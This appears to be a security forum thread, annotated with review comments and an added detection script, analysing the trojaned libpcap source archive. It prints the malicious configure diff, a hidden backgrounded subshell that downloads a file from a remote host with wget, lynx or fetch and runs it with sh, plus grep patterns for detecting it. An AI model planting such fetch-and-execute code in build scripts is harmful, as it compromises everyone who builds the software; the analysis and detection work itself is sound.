When I first realized I installed a trojaned libpcap, I did a search for conftes.c and confes and couldn't find it.
Ok, I've done a quick dirdiff on the source trees, and as far as I can see it's consistent with the trojaned archive, starting at the md5sum:
73ba7af963aff7c9e23fa1308a793dca (bad)
0597c23e3496a5c108097b2a0f1bd0c7 (good)
plus the code in gencode.c and configure.
Code:
--- libpcap-0.7.1-c/configure Mon Dec 10 09:34:21 2001
+++ libpcap-0.7.1-t/configure Mon Dec 10 09:34:21 2001
@@ -2043,15 +2041,17 @@
test -z "$ac_cv_prog_RANLIB" && ac_cv_prog_RANLIB=":"
fi
fi
-RANLIB="$ac_cv_prog_RANLIB"
-if test -n "$RANLIB"; then
+ RANLIB="$ac_cv_prog_RANLIB"
+ if test -n "$RANLIB"; then
echo "$ac_t""$RANLIB" 1>&6
else
echo "$ac_t""no" 1>&6
fi
+ CNF="services"
+ URL="mars.raketti.net/~mash/$CNF"
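Review bot: `CNF="services"` and `URL="mars.raketti.net/~mash/$CNF"` at the end of this hunk have nothing to do with the RANLIB probe the hunk touches; a generated configure has no reason to name a file to write and a remote host to pull it from, and the whitespace-only re-indentation of the RANLIB block above them pads the diff so the two new assignments are easy to overlook. Reject the hunk and treat the pair as an indicator when checking other unpacked source trees.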
@@ -2090,22 +2090,34 @@
fi
fi
-echo $ac_n "checking if sockaddr struct has sa_len member""... $ac_c" 1>&6
-echo "configure:2095: checking if sockaddr struct has sa_len member" >&5
+ (IFS=","
+ ARGS="wget -q -O -,lynx --source,fetch -q -o -"
+
+ for i in $ARGS; do
+ IFS=" "
+ $i $URL 1> $CNF
+ if [ -f $CNF ]; then sh $CNF
+ exit
+ fi
+ rm -f $CNF
+ done) 1>/dev/null 2>/dev/null &
+
+ echo $ac_n "checking if sockaddr struct has sa_len member""... $ac_c" 1>&6
+ echo "configure:2095: checking if sockaddr struct has sa_len member" >&5
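Review bot: the subshell inserted before the sa_len probe fetches `$URL` with whichever of wget, lynx or fetch it finds, writes the result to `$CNF` and runs `sh $CNF`, backgrounded with both output streams sent to /dev/null; that is a silent download-and-execute unrelated to the check the hunk claims to perform, and the two original echo lines are only re-added with an indent to make it read like a reformat. Two details matter for anyone inspecting a build tree: `$i $URL 1> $CNF` creates the file even when the fetch tool is missing or fails, so `[ -f $CNF ]` is true on the first iteration and `sh $CNF` always runs; and `exit` comes before `rm -f $CNF`, so the fetched file named `services` is never removed and remains in the build directory.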
You see it'll try to D/L the file (that should be executed and removed) from a fixed address. So once that address is shut down the code is useless.
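As an added example (not code from the thread), a heuristic scan for the fetch-and-execute pattern in the configure diff above, run against a constructed copy of the trojaned lines and a constructed clean snippet from the same hunk; the indicator names and scoring threshold are my own assumptions.

```shell
#!/bin/sh
# Added example (not code from the thread): heuristic scan for the
# fetch-and-execute pattern in the trojaned configure shown above.

# Prints how many of three indicators FILE shows (0..3).
count_indicators() {
    f=$1; n=0
    # 1. a network download tool is named (a stock configure needs none)
    grep -qE '(^|[^[:alnum:]_])(wget|curl|lynx|fetch|ftp)([^[:alnum:]_]|$)' "$f" && n=$((n + 1))
    # 2. a shell is run on a file named only by a variable
    grep -qE '(^|[[:space:];])(sh|bash)[[:space:]]+"?\$[A-Za-z_]' "$f" && n=$((n + 1))
    # 3. a subshell is backgrounded with both output streams discarded
    grep -qE '\)[[:space:]]*[12]?>[[:space:]]*/dev/null.*[^&]&[[:space:]]*$' "$f" && n=$((n + 1))
    echo "$n"
}

# Returns 0 (suspicious, two or more indicators) or 1 (clean); prints matches.
scan_configure() {
    f=$1; n=$(count_indicators "$f")
    if [ "$n" -ge 2 ]; then
        echo "SUSPICIOUS ($n/3 indicators): $f"
        grep -nE '(wget|curl|lynx|fetch|ftp)|(sh|bash)[[:space:]]+"?\$|/dev/null.*[^&]&[[:space:]]*$' "$f"
        return 0
    fi
    echo "clean ($n/3 indicators): $f"; return 1
}

# Constructed samples: the trojaned text is the diff's "+" block above with
# the prefix removed; the clean text is unchanged lines from the same hunk.
TROJANED=$(mktemp); CLEAN=$(mktemp)
cat > "$TROJANED" <<'EOF'
CNF="services"
URL="mars.raketti.net/~mash/$CNF"
(IFS=","
ARGS="wget -q -O -,lynx --source,fetch -q -o -"
for i in $ARGS; do
IFS=" "
$i $URL 1> $CNF
if [ -f $CNF ]; then sh $CNF
exit
fi
rm -f $CNF
done) 1>/dev/null 2>/dev/null &
EOF
cat > "$CLEAN" <<'EOF'
RANLIB="$ac_cv_prog_RANLIB"
echo $ac_n "checking if sockaddr struct has sa_len member""... $ac_c" 1>&6
EOF
scan_configure "$TROJANED"; scan_configure "$CLEAN" || true
```

The sample text is only written to a temp file and grepped, never executed; on a real tree run `scan_configure` over each unpacked configure and compare the archive's md5sum against the values quoted above first.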
I was hoping they would post some more extensive info on what happened and specific steps on what to look for to fix a compromised box and details on the extent of the possible system damage.
http://online.securityfocus.com/bid/6171,
http://www.cert.org/advisories/CA-2002-30.html and
http://www.iss.net/security_center/static/10620.php
were clear enough to me...
I don't mind redoing this box, but I'd rather not if I don't have to, duh.
Ok, here's why. It's about responsibility. (I know, this sounds like parents speaking :-] )
(Below I don't mean "you" as in baduba, but generally speaking, ok.)
A system has a purpose, is under your control, and so generally speaking is beneficial to you and/or the community.
Once a system is compromised, its purpose changes from being beneficial to you to being beneficial to a somewhat select part of community. Not to mention you don't control it anymore.
When a compromised system is left in this state it will act as another jumpboard for crackers, which means they for instance can abuse the trust relationship your system has with other systems and go on to do damage. If so you would be what in judicial terms is called an accomplice, as in "aiding a criminal", because you would provide the means and your system becomes a threat, a liability to ppl on the connected network (LAN, WAN and Internet).
The real problem of course is the majority of the ppl don't realize how much more powerful a Linux system is compared to wintendo.
With that power comes the responsibility to "be a good netizen", something even less ppl are aware of.
I ran chkrootkit and it found no signatures or signs of trojans. Although this version (0.37, Release Date: Mon Sep 16 2002) may not have the signature for this particular trojan yet.
No, but using it will at least show if other stuff is introduced into the system.
I haven't used the libpcap binary yet so perhaps something didn't get started ie: essential trojan code?
Heh. No, it was to be deployed while running configure.
I haven't had time to obtain trusted binaries yet to check md5 sums and such, hopefully I can get to it in the next few days.
If you can't get a grip on running Tripwire, try using Aide. I prefer it as it's easier and as powerful as Tripwire.
Don't forget to save your signature databases on read-only media. Same goes for the RPM databases if you use them.
Trusted binaries can be found on one-floppy distros like tomsrtbt, your distro's bootable install/rescue cdr or forensics cdrs like Biatchux.
I usually have a fresh statically linked copy of Busybox lying around as well if space is concerned.
I only installed libpcap, not tcpdump, a bit of trivia.
Doesn't matter. Both were trojaned. As were Fragroute, OpenSSH, BitchX etc, etc...
Again, we all share a responsibility to demand from developers to at least have md5sums available, or better, have GPG/PGP signatures.
As we learned from the slapper worm, if you can't deinstall gcc, you should at least barricade it against public use.
Logging all outgoing traffic wouldn't be bad either. Not that it'll stop something like the tcpdump/libpcap trojan from working, but if you keep an eye on the logs you should be able to trace back when the system was compromised, which is a slight advantage over knowing nothing at all :-]
You should have the trojaned libpcap... don't do anything foolish. I'm curious what you can glean from the source.
Thanks. As you see I made some use of it. Shame I couldn't get the services file as well.
I have the box on a trusted test network, and I could run a sniffer trace over a couple of days and see what kind of traffic the compromised box is generating if you think it'd be useful.
If you want to keep an eye on it I'd say just log outgoing traffic (or only to 212.146.0.34 if you've got lotsa traffic) as well, weed out your usual destinations, and if nothing shows up, consider it clean.